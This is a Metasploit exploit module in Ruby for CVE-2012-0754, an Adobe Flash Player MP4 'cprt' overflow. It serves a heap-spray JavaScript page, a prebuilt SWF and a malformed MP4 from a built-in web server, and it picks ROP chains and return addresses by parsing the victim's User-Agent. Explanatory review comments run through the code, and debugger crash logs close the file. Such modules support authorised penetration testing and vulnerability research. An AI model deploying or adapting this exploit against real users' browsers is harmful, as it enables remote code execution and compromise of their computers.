GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser exploit module for CVE-2012-0754 (Adobe Flash Player, MP4 'cprt'
# atom overflow; see 'Description' below). The embedded HTTP server hands out
# a pre-built SWF from the data directory; that SWF fetches "/test.mp4", which
# create_mp4 generates on the fly. Per-target tuning lives in 'Targets'.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({
    :os_name => OperatingSystems::Match::WINDOWS,
    :method => "GetVariable",
    :classid => "ShockwaveFlash.ShockwaveFlash",
    :rank => NormalRanking, # reliable memory corruption
    :javascript => true
  })

  # Module metadata. Each target hash carries the keys read elsewhere in this
  # file: 'Rop' (nil, :msvcrt or :jre), 'Offset' (interpolated verbatim into
  # the JavaScript below, so it may be a JS expression rather than a number),
  # 'Ret', and 'ppr' for the ROP targets.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Adobe Flash Player MP4 'cprt' Overflow",
        'Description' => %q{
          This module exploits a vulnerability found in Adobe Flash
          Player. By supplying a corrupt .mp4 file loaded by Flash, it
          is possible to gain arbitrary remote code execution under the
          context of the user.

          This vulnerability has been exploited in the wild as part of
          the "Iran's Oil and Nuclear Situation.doc" e-mail attack.
          According to the advisory, 10.3.183.15 and 11.x before
          11.1.102.62 are affected.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Alexander Gavrun', # Vulnerability discovery
          'sinn3r', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2012-0754' ],
          [ 'OSVDB', '79300'],
          [ 'BID', '52034' ],
          [ 'URL', 'http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html' ],
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-03.html' ]
        ],
        'Payload' => {
          'Space' => 1000,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
        'DefaultOptions' => {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
        'Platform' => 'win',
        'Targets' => [
          # Flash Player 11.1.102.55
          # Flash Player 10.3.183.10
          [ 'Automatic', {} ],
          [
            'IE 6 on Windows XP SP3',
            {
              'Rop' => nil,
              'Offset' => '0x800 - code.length',
              'Ret' => 0x0c0c0c0c
            }
          ],
          [
            'IE 7 on Windows XP SP3',
            {
              'Rop' => nil,
              'Offset' => '0x800 - code.length',
              'Ret' => 0x0c0c0c0c
            }
          ],
          [
            'IE 8 on Windows XP SP3 with msvcrt ROP',
            {
              'Rop' => :msvcrt,
              'Offset' => '0x5f4',
              'Ret' => 0x77c15ed5,
              'ppr' => 0x77C1CAFB
            }
          ],
          [
            'IE 8 on Windows XP SP3 with JRE ROP',
            {
              'Rop' => :jre,
              'Offset' => '0x5f4',
              'Ret' => 0x77c15ed5,
              'ppr' => 0x77C1CAFB
            }
          ],
          [
            'IE 7 on Windows Vista',
            {
              'Rop' => nil,
              'Offset' => '0x5f4',
              'Ret' => 0x0c0c0c0c
            }
          ],
          [
            'IE 8 on Windows 7 SP1',
            {
              'Rop' => :jre,
              'Offset' => '0x5f4',
              'Ret' => 0x7c348b05,
              'ppr' => 0x7c34272e
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-02-15',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Returns a random 32-bit little-endian integer built from n random
  # alphabetic bytes. unpack("V") consumes only the first four bytes, so
  # n > 4 wastes bytes and n < 4 yields nil rather than an Integer.
  def junk(n = 4)
    return rand_text_alpha(n).unpack("V").first
  end

  # Builds the payload blob for target t. cli is accepted but not used.
  # Non-ROP targets get payload.encoded as-is; ROP targets get a 6-byte
  # stack-adjust stub prepended and the result is wrapped by
  # generate_rop_payload with chain 'msvcrt' (target 'xp') or 'java' (target '').
  # NOTE(review): pivot is assembled from 'ppr', junk and t.ret but never
  # referenced afterwards; it looks like leftover code and could be dropped.
  def get_payload(t, cli)
    if t['Rop'].nil?
      code = ""
    else
      # Fix the stack to avoid anything busted
      code = "\x81\xC4\x54\xF2\xFF\xFF"
    end
    code << payload.encoded

    # No rop. Just return the payload.
    return code if t['Rop'].nil?

    # Anything other than :msvcrt falls through to the Java chain.
    rop_name = (t['Rop'] and t['Rop'] == :msvcrt) ? 'msvcrt' : 'java'
    rop_target = (rop_name == 'msvcrt') ? 'xp' : ''

    pivot = [t['ppr']].pack('V*') # POP/POP/RET
    pivot << [junk].pack('V*')
    pivot << [t.ret].pack('V*')

    code = generate_rop_payload(rop_name, code, { 'target' => rop_target })
    return code
  end

  # Picks a target from the client's User-Agent string, or returns nil when
  # no branch matches. Selection rests entirely on a client-supplied header,
  # so a spoofed or unusual UA simply results in a 404 from on_request_uri.
  # NOTE(review): targets[4] ('IE 8 on Windows XP SP3 with JRE ROP') is never
  # chosen automatically; it is only reachable when the user selects it.
  def get_target(agent)
    # If a target was already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
      return targets[1] # IE 6 on Windows XP SP3
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
      return targets[2] # IE 7 on Windows XP SP3
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
      return targets[3] # IE 8 on Windows XP SP3 with msvcrt ROP
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
      return targets[5] # IE 7 on Windows Vista
    elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
      return targets[6] # IE 8 on Windows 7 SP1 (JRE ROP); the index-6 entry, not Vista
    else
      return nil
    end
  end

  # Registers the fixed "/test.mp4" path with the HTTP server, because the
  # bundled SWF requests exactly that path (see the comment below).
  def primer
    # "/test.mp4" is currently hard-coded in the swf file, so we need to add to resource
    hardcoded_uripath("/test.mp4")
  end

  # Reads the SWF into @swf once, then hands off to super so every request
  # handled by on_request_uri can serve the same bytes.
  def exploit
    @swf = create_swf
    super
  end

  # HTTP request handler. Dispatches in this order:
  #   1. unsupported User-Agent      -> 404 via send_not_found
  #   2. URI ending in .mp4          -> the MP4 from create_mp4
  #   3. URI ending in .swf          -> @swf (loaded in exploit)
  #   4. anything else               -> the HTML page embedding the SWF
  # The HTML is built with %Q| ... | and then stripped of its 4-space indent,
  # so the literal's indentation must stay at exactly four spaces.
  # NOTE(review): the /\.mp4$/ and /\.swf$/ checks use $, which matches at
  # any line end; \z would anchor to the end of the whole string.
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    my_target = get_target(agent)

    # Avoid the attack if the victim doesn't have the same setup we're targeting
    if my_target.nil?
      print_error("Browser not supported: #{agent}")
      send_not_found(cli)
      return
    end

    print_status("Client requesting: #{request.uri}")

    # The SWF requests our MP4 trigger
    if request.uri =~ /\.mp4$/
      print_status("Sending MP4...")
      mp4 = create_mp4(my_target)
      send_response(cli, mp4, { 'Content-Type' => 'video/mp4' })
      return
    end

    if request.uri =~ /\.swf$/
      print_status("Sending Exploit SWF")
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
      return
    end

    p = get_payload(my_target, cli)

    # Payload and filler bytes as %u-escaped JS strings in the target's endianness.
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
    js_nops = Rex::Text.to_unescape("\x0c" * 4, Rex::Arch.endian(my_target.arch))
    # Random 1..100-character identifier used as the JS variable name below.
    randnop = rand_text_alpha(rand(100) + 1)

    # my_target['Offset'] is spliced in verbatim, which is why some targets
    # carry a JS expression in that field.
    js_pivot = <<-JS
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var #{randnop} = "#{js_nops}";
    var nops = unescape(#{randnop});

    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);

    heap_obj.gc();
    heap_obj.debug(true);
    for (var i=1; i < 0x1C2; i++) {
    heap_obj.alloc(block);
    }
    heap_obj.debug(true);
    JS

    # heaplib prepends the heapLib helper script; :noobfu asks for the unobfuscated form.
    js_pivot = heaplib(js_pivot, { :noobfu => true })

    # Strip a trailing '/' from the resource path, then append a random 3..8 letter .swf name.
    swf_uri = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource
    swf_uri << "/#{rand_text_alpha(rand(6) + 3)}.swf"

    html = %Q|
    <html>
    <head>
    <script>
    #{js_pivot}
    </script>
    </head>
    <body>
    <center>
    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
    id="test" width="1" height="1"
    codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
    <param name="movie" value="#{swf_uri}" />
    <embed src="#{swf_uri}" quality="high"
    width="1" height="1" name="test" align="middle"
    allowNetworking="all"
    type="application/x-shockwave-flash"
    pluginspage="http://www.macromedia.com/go/getflashplayer">
    </embed>

    </object>
    </center>

    </body>
    </html>
    |

    html = html.gsub(/^ {4}/, '')

    print_status("Sending html")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end

  # Reads the pre-built SWF shipped under the data directory as
  # exploits/CVE-2012-0754.swf and returns its bytes.
  # NOTE(review): File.open without a block or ensure leaks the descriptor
  # if read raises; ::File.binread(path) would be the equivalent safe form.
  def create_swf
    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2012-0754.swf")
    fd = ::File.open(path, "rb")
    swf = fd.read(fd.stat.size)
    fd.close

    return swf
  end

  # Builds the malformed MP4 served for "/test.mp4". target is accepted but
  # unused, so the same bytes go to every target. Layout: an 'ftyp' box with
  # declared length 0x18, then a 'cprt' box whose declared length 0x0D is
  # followed by far more data than that, ending in 2586 copies of "\x0c\x0c\x0c\x0c".
  def create_mp4(target)
    mp4 = ""
    mp4 << "\x00\x00\x00\x18"
    mp4 << "ftypmp42"
    mp4 << "\x00\x00\x00\x00"
    mp4 << "mp42isom"
    mp4 << "\x00\x00\x00\x0D"
    mp4 << "cprt"
    mp4 << "\x00\xFF\xFF\xFF"
    mp4 << "\x00\x00\x00\x00"
    mp4 << "\x0c\x0c\x0c\x0c" * 2586

    return mp4
  end
end
=begin
C:\WINDOWS\system32\Macromed\Flash\Flash11e.ocx
(4b4.1d0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=00000000 ecx=0308b1a0 edx=00000004 esi=0308b1a0 edi=00000001
eip=027a2626 esp=0377fec0 ebp=0377ff0c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash11e.ocx -
Flash11e+0x52626:
027a2626 ff5008 call dword ptr [eax+8] ds:0023:0c0c0c14=????????
C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx
(510.9b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=03e46810 ecx=0396b160 edx=00000004 esi=03e46cd4 edi=00000000
eip=10048b65 esp=0428fd10 ebp=0428feb4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx -
Flash10x+0x48b65:
10048b65 ff5008 call dword ptr [eax+8] ds:0023:0c0c0c14=????????
=end